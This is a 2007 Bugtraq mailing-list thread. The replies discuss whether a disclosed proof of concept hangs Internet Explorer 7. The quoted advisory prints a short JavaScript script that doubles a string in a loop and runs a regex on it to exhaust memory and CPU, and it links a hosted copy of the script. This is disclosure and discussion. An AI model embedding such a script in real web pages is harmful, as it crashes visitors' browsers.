Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said. Tom Thor (Hammer of God) wrote: > Actually, I just get a message that says "A script on this page is > causing Internet Explorer to run slowly." But my CPU usage for > iexplore.exe is only at 20, and my system didn't slow down in the > least. I went ahead and told IE to continue to run the script, and pops > up again in a bit asking me the same thing. Finally bored, I say "no" > and it immediately came up with "Goodbye" on the page. > > If this actually makes Safari and Konqueror crash, why the "stop using > Microsoft products" recommendation? At least IE is smart enough to tell > me that your little "stupidInternetExploder" script is being pesky. > > t > > ----- Original Message ----- From: "J. Oquendo" <sil@xxxxxxxxxxxxxxx> > To: <bugtraq@xxxxxxxxxxxxxxxxx> > Sent: Tuesday, April 17, 2007 10:09 AM > Subject: Internet Explorer Crash > > >> > Product: Internet Explorer Version 7.0.5730.11 > Impact: Browser crash possibly more > Author: Jesus Oquendo > echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' > > > I. BACKGROUND > Why bother? Who doesn't know what Internet Explorer and Microsoft are. > > II. DESCRIPTION > IE 7 is vulnerable to a script which causes the browser to hang. The > memory and CPU usage go through the roof. Originally the script caused > (and still causes) Safari and Konqueror to crash. > > III SOLUTION > Stop using Microsoft products or deal with a new advisory every other > day. > > IV. Proof > http://www.infiltrated.net/stupidInternetExploder.html > > V. Code > > $ more /stupidInternetExploder.html > > <script> > > var reg = /(.)*/; > > var z = 'Z'; > while (z.length <= > 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 > > 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 > > 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 > > 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 > > 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) > z+=z; > var boum = reg.exec(z); > > </script> > > Goodbye > > > J. Oquendo > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 > sil . infiltrated @ net http://www.infiltrated.net > The happiness of society is the end of government. > John Adams > > >> >>
